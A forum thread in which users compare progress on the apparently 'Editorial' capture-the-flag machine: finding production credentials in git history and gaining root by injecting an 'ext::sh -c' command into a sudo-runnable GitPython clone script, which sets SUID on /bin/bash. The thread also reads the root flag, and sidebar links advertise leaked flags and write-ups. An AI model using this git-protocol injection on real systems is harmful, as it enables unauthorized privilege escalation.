Possibly Related Threads…

princecyber · Jun 15, 2024, 09:10 PM

all i am getting is not found whatever endpoint i try

ritualist · Jun 15, 2024, 09:12 PM

Credentials for prod are in git logs

There is a python script you can run as sudo. Didn't figure out abuse yet.

BahsbFAISfjhb · (This post was last modified: Jun 15, 2024, 09:14 PM by BahsbFAISfjhb.)

Looking for secrets in apps/.git, not found anything just yet

(Jun 15, 2024, 09:12 PM)ritualist Wrote: Credentials for prod are in git logs

There is a python script you can run as sudo. Didn't figure out abuse yet.

Where? I can't see anything with git log ./.git

ritualist · Jun 15, 2024, 09:16 PM

(Jun 15, 2024, 09:12 PM)BahsbFAISfjhb Wrote: Looking for secrets in apps/.git, not found anything just yet

(Jun 15, 2024, 09:12 PM)ritualist Wrote: Credentials for prod are in git logs

There is a python script you can run as sudo. Didn't figure out abuse yet.

Where? I can't see anything with git log ./.git

git show 1e84a036b2f33c59e2390730699a488c65643d28
in ~/apps

idrkwhatimdoing · Jun 15, 2024, 09:20 PM

for root just use /bin/bash suid

so much easyier

BahsbFAISfjhb · Jun 15, 2024, 09:26 PM

(Jun 15, 2024, 09:23 PM)hatteba Wrote: Can someone say what we need to rewrite? or what to do? for root?

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
Traceback (most recent call last):
File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
finalize_process(proc, stderr=stderr)
File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
proc.wait(**kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always branches new_changes
stderr: 'fatal: repository 'branches' does not exist

It's command injection, read the script that you are calling - wildcard in the context of sudo -l just means any input

void-reaper · Jun 15, 2024, 09:28 PM

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::/bin/bash -p"

This doesnt work

newbi31 · Jun 15, 2024, 09:34 PM

user flag hint how to get username and password through api, there is not path in url like api

void-reaper · (This post was last modified: Jun 15, 2024, 09:46 PM by void-reaper.)

This worked :D

prod@editorial:~$ echo '#!/bin/bash' > /tmp/exploit.sh
echo 'chmod u+s /bin/bash' >> /tmp/exploit.sh

prod@editorial:~$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c '/tmp/exploit.sh'"

prod@editorial:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14 11:31 /bin/bash

prod@editorial:~$ /bin/bash -p
bash-5.1#

nyctophile · (This post was last modified: Jun 15, 2024, 09:51 PM by nyctophile.)

(Jun 15, 2024, 09:46 PM)imhitt Wrote: stderr: 'fatal: destination path 'new_changes' already exists and is not an empty directory.

What i missed ? Should i wait for cron ?

ext::sh -c cat% /root/root.txt% >% /tmp/root.txt

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] CPTS 12 FLAGS	pulsebreaker	66	1,790	6 hours ago Last Post: vlka
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	370	92,595	11 hours ago Last Post: lifolifo007
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,218	Yesterday, 02:10 PM Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,526	Apr 29, 2026, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	416	Apr 29, 2026, 10:36 PM Last Post: op334